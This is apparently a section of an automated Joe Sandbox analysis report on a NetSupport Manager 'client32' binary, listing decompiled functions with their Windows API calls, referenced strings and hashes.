Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Cursor$DispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpen_memsetwsprintf
String ID: NSLockExit
API String ID: 2358329513-1578567420
Opcode ID: f1b6d6177d52e0c3756226750f04fdb34155f1e8b4de2aa2837cdf87b9045ced
Instruction ID: da66d542c3fb9b9b9736b56b4e9605354d9b8fdeed183c23e7030b173a746b46
Opcode Fuzzy Hash: f1b6d6177d52e0c3756226750f04fdb34155f1e8b4de2aa2837cdf87b9045ced
Instruction Fuzzy Hash: 0451AC75E0032AABDB11DFA48C81FEDF7B8EB44718F1085A5E615E7184EB71AA40CF91

Function 68C6FC60 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 68C6FCB2
std::_Xinvalid_argument.LIBCPMT ref: 68C6FCD4
_memmove.LIBCMT ref: 68C6FD30
_memmove.LIBCMT ref: 68C6FD55
_memmove.LIBCMT ref: 68C6FD69
_memmove.LIBCMT ref: 68C6FD9B
_memmove.LIBCMT ref: 68C6FF42
std::_Xinvalid_argument.LIBCPMT ref: 68C6FF76

Strings

string too long, xrefs: 68C6FCAD, 68C6FCCF
invalid string position, xrefs: 68C6FF71

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: ccf1d417108900528cdc399d9cf86e3363bcc566cc16ab511a7a83db3508ec1a
Instruction ID: 8d6417e4e5649b2ec5c064e26a03418beed2dd9ad6e06c5341d33f90841d3b54
Opcode Fuzzy Hash: ccf1d417108900528cdc399d9cf86e3363bcc566cc16ab511a7a83db3508ec1a
Instruction Fuzzy Hash: 48B171717601049FDB28CE1CDCD1A5E77A6EF85724B94492DF8A2CB741E7B0E8C287A1

Function 11121100 Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 270threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(0000001C), ref: 1112117E
GetCurrentThreadId.KERNEL32 ref: 111211B5
GlobalAddAtomA.KERNEL32(NSMRemote32), ref: 111213AA
GetVersionExA.KERNEL32(?,?,?,00000000), ref: 111213D3

Strings

IgnoreScrape, xrefs: 1112146A
MaxLag, xrefs: 1112143E
ScaleToFitTilingFactor, xrefs: 11121420
NSMRemote32, xrefs: 111213A5
ScaleToFitMode, xrefs: 11121406
Show, xrefs: 11121376
LimitColorbits, xrefs: 11121201
LegacyScrape, xrefs: 1112147E
ShowBigBlits, xrefs: 111213F2
View, xrefs: 1112120F, 1112130F, 111213F7, 1112140B, 11121425, 11121443, 1112146F, 11121483

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomCriticalCurrentGlobalInitializeSectionThreadVersion
String ID: IgnoreScrape$LegacyScrape$LimitColorbits$MaxLag$NSMRemote32$ScaleToFitMode$ScaleToFitTilingFactor$Show$ShowBigBlits$View
API String ID: 3042533059-2538903574
Opcode ID: afd89c2d0da7b64e68538ed8bc1b9139911b90978eaacfc1fa793ef2651d198e
Instruction ID: eb6122d518b0ca6329e0510ddbb3154fc8dc97cf8e450e1036336aff3cebea76
Opcode Fuzzy Hash: afd89c2d0da7b64e68538ed8bc1b9139911b90978eaacfc1fa793ef2651d198e
Instruction Fuzzy Hash: 59B18CB8A00705AFD760CF65CD84B9BFBF5AF85704F20856EE55A9B280DB30A940CF51

Function 68C71F90 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 240networkCOMMON

Download Yara Rule

APIs

Part of subcall function 68C7DBD0: _malloc.LIBCMT ref: 68C7DBE9
Part of subcall function 68C7DBD0: wsprintfA.USER32 ref: 68C7DC04
Part of subcall function 68C7DBD0: _memset.LIBCMT ref: 68C7DC27

getpeername.WSOCK32(?,?,?,68CA0E3D,?,?,?,?), ref: 68C72198
htons.WSOCK32(?,?,?,?,?,68CA0E3D,?,?,?,?), ref: 68C721A9
EnterCriticalSection.KERNEL32(68CAB898,?,?,?,68CA0E3D,?,?,?,?), ref: 68C721D9
LeaveCriticalSection.KERNEL32(68CAB898,?,?,?,?), ref: 68C7220C
EnterCriticalSection.KERNEL32(68CAB898,?,?,?,68CA0E3D,?,?,?,?), ref: 68C72217
LeaveCriticalSection.KERNEL32(68CAB898,?,?,?,?), ref: 68C72227
std::exception::exception.LIBCMT ref: 68C7226B
__CxxThrowException@8.LIBCMT ref: 68C72286

Strings

LWT, xrefs: 68C72139
RESULT, xrefs: 68C720A0
SUB, xrefs: 68C720FA
FNAME, xrefs: 68C720DC
LINK, xrefs: 68C720BE
FSIZE, xrefs: 68C72118

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Exception@8Throw_malloc_memsetgetpeernamehtonsstd::exception::exceptionwsprintf
String ID: FNAME$FSIZE$LINK$LWT$RESULT$SUB
API String ID: 205723298-3189277165
Opcode ID: 5190544390a4dca428d053c442ba46e9eeff8570a1d7aa6d45378fa84d4d6a58
Instruction ID: 7620ea325fec61d4301b4edd86a084559249808535a23d8f88b7d151a6529870
Opcode Fuzzy Hash: 5190544390a4dca428d053c442ba46e9eeff8570a1d7aa6d45378fa84d4d6a58
Instruction Fuzzy Hash: 929128B5C0025D9FDB20DFA8DC90AAEBBB4FF48318F90452AE55AE7200FB345A45CB51

Function 1100B330 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 190fileCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

EnterCriticalSection.KERNEL32(?,Audio,DisableSounds,00000000,00000000,62C07B5E), ref: 1100B3BB
CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 1100B3D8
_calloc.LIBCMT ref: 1100B409
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100B42F
LeaveCriticalSection.KERNEL32(?), ref: 1100B469

Part of subcall function 1100AC60: EnterCriticalSection.KERNEL32(?,62C07B5E), ref: 1100ACA4
Part of subcall function 1100AC60: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACC2
Part of subcall function 1100AC60: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100AD0E
Part of subcall function 1100AC60: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD55
Part of subcall function 1100AC60: CloseHandle.KERNEL32(00000000), ref: 1100AD5C
Part of subcall function 1100AC60: _free.LIBCMT ref: 1100AD73
Part of subcall function 1100AC60: FreeLibrary.KERNEL32(?), ref: 1100AD8B
Part of subcall function 1100AC60: LeaveCriticalSection.KERNEL32(?), ref: 1100AD95

LeaveCriticalSection.KERNEL32(?), ref: 1100B48E

Strings

Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4E3
Vista AddAudioCapEvtListener(%p), xrefs: 1100B513
InitCaptureSounds NT6, xrefs: 1100B4AE
Audio, xrefs: 1100B367
\\.\NSAudioFilter, xrefs: 1100B3D0
Vista new pAudioCap=%p, xrefs: 1100B4F3
DisableSounds, xrefs: 1100B362
Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B53C

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$CreateEnterLibrary$AddressCloseEventExchangeFileFreeHandleInterlockedLoadProc__wcstoi64_calloc_free
String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
API String ID: 2005284756-2362500394
Opcode ID: 1b3ff62302edfe70963872ecb882b6fdc49eed430e431981be697212f47832f9
Instruction ID: 13704de1d539ef30c3066c3cc5484e22fa9722ec6e344ec07ec17af159e95cc0
Opcode Fuzzy Hash: 1b3ff62302edfe70963872ecb882b6fdc49eed430e431981be697212f47832f9
Instruction Fuzzy Hash: A951D8B5E04A4AAFE714CF64DC80BAEF7E8FB04359F10467EE92993640E731765087A1

Function 11103110 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1110313E
EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
GetTickCount.KERNEL32 ref: 1110314D
GetTickCount.KERNEL32 ref: 111031A0
LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
GetTickCount.KERNEL32 ref: 111031DA
LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031E3
EnterCriticalSection.KERNEL32(111EC5C4), ref: 1110320C
LeaveCriticalSection.KERNEL32(111EC5C4,00000000,?,00000000), ref: 111032D3

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 110EEA50: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11103277,?), ref: 110EEA7B

Strings

e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 1110318E, 11103243, 11103289
Warning. took %d ms to get simap lock, xrefs: 11103159
Warning. simap lock held for %d ms, xrefs: 111031B9, 111031F3
info. new psi(%d) = %x, xrefs: 111032C1
psi, xrefs: 11103193, 11103248, 1110328E

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountTick$Leave$Enter$Initialize_memsetwsprintf
String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
API String ID: 3572004736-3013461081
Opcode ID: 4a4596e797a431f39ce7c6c591fcef58b5bcf60c947cd2351498c6c4e6f0d4f2
Instruction ID: 751a9e08e7d07462896511fc241fa3711dcdedb17ea13ac702f7fc28ec4d2028
Opcode Fuzzy Hash: 4a4596e797a431f39ce7c6c591fcef58b5bcf60c947cd2351498c6c4e6f0d4f2
Instruction Fuzzy Hash: 9441F67AF04519AFCB11DFE59C85EEEFBB5AB44218B104525F905E7640EB306900CBA1

Function 68C78140 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 147libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(netapi32.dll), ref: 68C78164
GetProcAddress.KERNEL32(00000000,Netbios), ref: 68C7817F
_memset.LIBCMT ref: 68C7819B
_memset.LIBCMT ref: 68C781EB
_memset.LIBCMT ref: 68C7821C
wsprintfA.USER32 ref: 68C78305
FreeLibrary.KERNEL32(?), ref: 68C78317

Strings

* , xrefs: 68C7822F
Netbios, xrefs: 68C78179
%02x%02x%02x%02x%02x%02x, xrefs: 68C782FF
netapi32.dll, xrefs: 68C78156
DEST, xrefs: 68C782A4
RAS, xrefs: 68C782B6
3, xrefs: 68C7827E

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _memset$Library$AddressFreeLoadProcwsprintf
String ID: RAS$%02x%02x%02x%02x%02x%02x$* $3$DEST$Netbios$netapi32.dll
API String ID: 3525900152-2950743334
Opcode ID: ca86d5ffa25419dd1840e74842a8004fc37a27cb2d73c2fa834ff63fbc6003a1
Instruction ID: dccaca428e675078dc8e9eafdfe1153bfe954578457afeb92b859acce87cefe1
Opcode Fuzzy Hash: ca86d5ffa25419dd1840e74842a8004fc37a27cb2d73c2fa834ff63fbc6003a1
Instruction Fuzzy Hash: 66511870D542689FDB22CF298C54BAE7BFCAF49309F4040D9E99CA7240E6758B85CF54

Function 1103B020 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 140sleepwindowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1103B15F
Sleep.KERNEL32(000001F4), ref: 1103B1A4
PostMessageA.USER32(000301CE,00000010,00000000,00000000), ref: 1103B1CF

Strings

Client, xrefs: 1103B05F, 1103B07C, 1103B099, 1103B0D5, 1103B18F
AssertOnReboot, xrefs: 1103B102
DisableReboot, xrefs: 1103B094
FALSE || !"assertOnReboot", xrefs: 1103B122
DisableLogoff, xrefs: 1103B05A, 1103B0D0, 1103B18A
GPFOnReboot, xrefs: 1103B133
_debug, xrefs: 1103B107, 1103B138
sd - Post WM_CLOSE to %08x, xrefs: 1103B1B6
DisablePowerOff, xrefs: 1103B077
CLTCONN.CPP, xrefs: 1103B11D
DisableShutDown, xrefs: 1103B173

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountMessagePostSleepTick
String ID: AssertOnReboot$CLTCONN.CPP$Client$DisableLogoff$DisablePowerOff$DisableReboot$DisableShutDown$FALSE || !"assertOnReboot"$GPFOnReboot$_debug$sd - Post WM_CLOSE to %08x
API String ID: 507213284-4185502373
Opcode ID: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
Instruction ID: f79ec28786b2f4c10a59bc50768d7a54d57fb70274f002d705909bb0de105b61
Opcode Fuzzy Hash: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
Instruction Fuzzy Hash: 12412934F4065EBEE721CA529C85FBDB795ABC0B0DF5040A5FE247E2C0EB60B4408355

Function 11157010 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4
std::exception::exception.LIBCMT ref: 111570CD
__CxxThrowException@8.LIBCMT ref: 111570E2

Strings

WlanGetAvailableNetworkList, xrefs: 1115709E
WlanOpenHandle, xrefs: 1115706E
wlanapi.dll, xrefs: 11157053
WlanEnumInterfaces, xrefs: 1115708E
WlanFreeMemory, xrefs: 111570AE
WlanCloseHandle, xrefs: 1115707E

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Exception@8LibraryLoadThrow_memsetstd::exception::exceptionwsprintf
String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
API String ID: 1463381176-1736626566
Opcode ID: 4abc1ebb41a915a1e68705d27eae302cf7f0fb804471937ee6b8da54ad230a0c
Instruction ID: caad9b3ffb412b0ce201366128ee2238a993313849ab4ce7a7f1ca44c3893492
Opcode Fuzzy Hash: 4abc1ebb41a915a1e68705d27eae302cf7f0fb804471937ee6b8da54ad230a0c
Instruction Fuzzy Hash: 6521E1B5A01718AFC751EFADCD809ABFBF9AF58204700C92AE469C3301E670E401CF91

Function 68C70F59 Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 263COMMON

Download Yara Rule

APIs

Part of subcall function 68C7DBD0: _malloc.LIBCMT ref: 68C7DBE9
Part of subcall function 68C7DBD0: wsprintfA.USER32 ref: 68C7DC04
Part of subcall function 68C7DBD0: _memset.LIBCMT ref: 68C7DC27

_memset.LIBCMT ref: 68C70FAD
EnterCriticalSection.KERNEL32(68CAB898,68CA0E3D,?,?,?,?,?,?,00000000), ref: 68C71293
LeaveCriticalSection.KERNEL32(68CAB898,?,?,?,?,?,?,00000000), ref: 68C712E3
EnterCriticalSection.KERNEL32(68CAB898,68CA0E3D,?,?,?,?,?,?,00000000), ref: 68C71316
LeaveCriticalSection.KERNEL32(68CAB898,?,?,?,?,?,?,00000000), ref: 68C7132D
std::exception::exception.LIBCMT ref: 68C7135B
__CxxThrowException@8.LIBCMT ref: 68C71376

Strings

MORE, xrefs: 68C7107F
RESULT, xrefs: 68C71061
CAP, xrefs: 68C71121
UID, xrefs: 68C710BE
TXT, xrefs: 68C71100
FLG, xrefs: 68C71163
TIM, xrefs: 68C71142
b, xrefs: 68C712CE
END_REC, xrefs: 68C71250
ENC, xrefs: 68C710DF

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave_memset$Exception@8Throw_mallocstd::exception::exceptionwsprintf
String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TXT$UID$b
API String ID: 275297366-914382535
Opcode ID: 44880e4a56c35532b14b574ce993d0e23d90b765d46fd12400714463ec21eadb
Instruction ID: dda36696c5a197e21debf7699512b9209b2c1e329e6b352631e9ee0dea3a6087
Opcode Fuzzy Hash: 44880e4a56c35532b14b574ce993d0e23d90b765d46fd12400714463ec21eadb
Instruction Fuzzy Hash: 46913EB5D0025E9FEF30DFA49C91AFE7AB4AF04308F80057AD45AE6201F7354A89CB56

Function 11027130 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 174windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

